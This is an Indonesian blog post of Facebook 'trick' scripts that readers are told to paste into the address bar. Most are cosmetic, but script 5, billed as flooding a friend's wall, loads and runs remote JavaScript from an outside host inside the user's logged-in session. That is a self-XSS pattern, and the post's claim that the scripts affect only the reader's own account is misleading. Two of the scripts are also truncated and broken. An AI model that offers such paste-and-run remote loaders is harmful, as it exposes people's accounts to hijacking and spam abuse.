Thursday, February 28, 2013

Kumpulan script unik Facebook

Leave a Comment

Liat aja FB we, jadi warna-warni kan ( asli tuh, bukan editan ), hehe, mau tau caranya ???
Nih gan kali ni we share script2 buat agan2 yag suka iseng2 pake yang namanya Facebook.
caranya gampang, tinggal copas scriptnya trus paste di addres bar facebook agan ( yang we garisin merah tuh )
Nih we kasih scriptnya,, :



1. Script tulisan bergaris bawah merah seperti di MS Word pada facebook

javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0


2. Script membuat tampilan facebook menjadi tidak beraturan

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i


3. Script buat gambar atau foto fb jadi melayang-layang

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);


4. Script foto fb mengikuti cursor kita

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=100; y4=100; var DI= document.images; DIL=DI.length; function A(_X,_Y){for(i=0; i


5. Script buat membanjiri wall milik teman

javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);


6. Script merubah tulisan pada Facebook menjadi warna-warni

javascript:i=0;c=["red","green","blue","yellow","magenta","orange"," pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',1);void(0);


7. Script membuat status kita agar menjadi Offline

javascript:statusControl.sendVisibility(false);


8. Script untuk mengembalikan Status menjadi Online

javascript:statusControl.sendVisibility(true);

Nih script cuman berlaku di FB agan aja, FB tmen2 agan yang laen gk akan terpengaruh,

NB : Script nih biasanya cuman work kalo yang make orang ganteng,, kwkwkwkw..
kalo gk berhasil biasanya agan kurang ganteng...heheh peace...
biasanya kalo pake mozilla versi baru gk work gan,

Silahkan Copas gan, asal jangan di Repost..

Socialize It →
Subscribe Us by Email and Get Free Updates

Other Interesting Posts :

© 2014 All Rights Reserved.
Nara Official Blog & Powered By NaraOfficialBlog